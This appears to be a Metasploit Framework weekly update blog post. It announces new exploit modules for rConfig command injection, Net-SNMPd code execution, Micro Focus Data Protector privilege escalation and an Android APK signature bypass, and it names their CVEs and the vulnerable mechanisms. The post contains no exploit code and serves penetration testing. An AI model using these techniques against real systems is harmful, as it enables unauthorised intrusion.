Last updated at Fri, 09 Feb 2024 14:31:15 GMT
Config R Us
Many versions of network management tool rConfig are vulnerable to unauthenticated command injection, and contributor bcoles added a new exploit module for targeting those versions. Present in v3.9.2 and prior, this vulnerability centers around the install
directory not being automatically cleaned up following software installation, leaving behind a PHP file that can be utilized to execute arbitrary commands as the web server user. Also serves as a friendly reminder that it’s good to clean up after yourself...
RCE for SNMP
Targets running Net-SNMPd may be vulnerable to remote code execution, and, thanks to Steve Embling, we’ve got a new module for that. Relying on the service user having R/W access, this module supports protocol versions 1 and 2c and uses SNMP extension MIBs to enable remote code execution on the target. You might keep this one in mind next time you bump into NET-SNMPd…!
Keeping things in (Micro) Focus…
Contributor s7u55 swung by with a new privesc module targeting Data Protector software from Micro Focus (formerly HPE Software). Vulnerable versions of Data Protector allow this new module to exploit the trusted $PATH
environment variable of the SUID binary omniresolve
, leading to privilege escalation. While this vulnerability was patched in version 10.40, many earlier versions of Data Protector may be vulnerable.
A penny for your thoughts...
We've got a fantastic new docs writer onboard, and she’s helping us improve and expand Metasploit documentation. Which areas of Framework could be better documented? Which areas totally lack explanation or useful examples? Let us know here!
New modules (4)
- Micro Focus (HPE) Data Protector SUID Privilege Escalation by s7u55, which exploits CVE-2019-11660.
- Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution by Steve Embling at InteliSecure.
- rConfig install Command Execution by bcoles and mhaskar, which exploits CVE-2019-16662.
- Android Janus APK Signature bypass by GuardSquare, V-E-O, h00die, and timwr, which exploits CVE-2017-13156.
Enhancements and features
- PR #12510 from wvu-r7 updates the Msf::Exploit::HttpClient mixin, allowing modules to elect to receive a partial response to an HTTP request when the server times out before sending the total length advertised in the response headers.
- PR #12535 from bcoles adds the module traits
Reliability
andStability
to a handful of local exploit modules. - PR #12492 from wvu-r7 updates the
coldfusion_rds module
(and also moves and renames it more appropriately tocoldfusion_rds_auth_bypass
) to improve vulnerable page detection. - PR #12495 from h00die adds documentation for the Android screen capture and lock removal post modules.
- PR #12522 from cnotin updates the description for the THREADS option in scanner modules to clarify that only one thread is created per target host.
- PR #12547 from jeffmcjunkin updates the null-pointer-deref.txt banner to MSF5.
Bugs fixed
- PR #12463 from bwatters-r7 fixes delimiter selection on PowerShell payload commands.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
We recently announced the release of Metasploit 5. You can get it by cloning
the Metasploit Framework repo (master branch). To install fresh without using git,
you can use the open-source-only Nightly Installers or the binary installers
(which also include the commercial editions).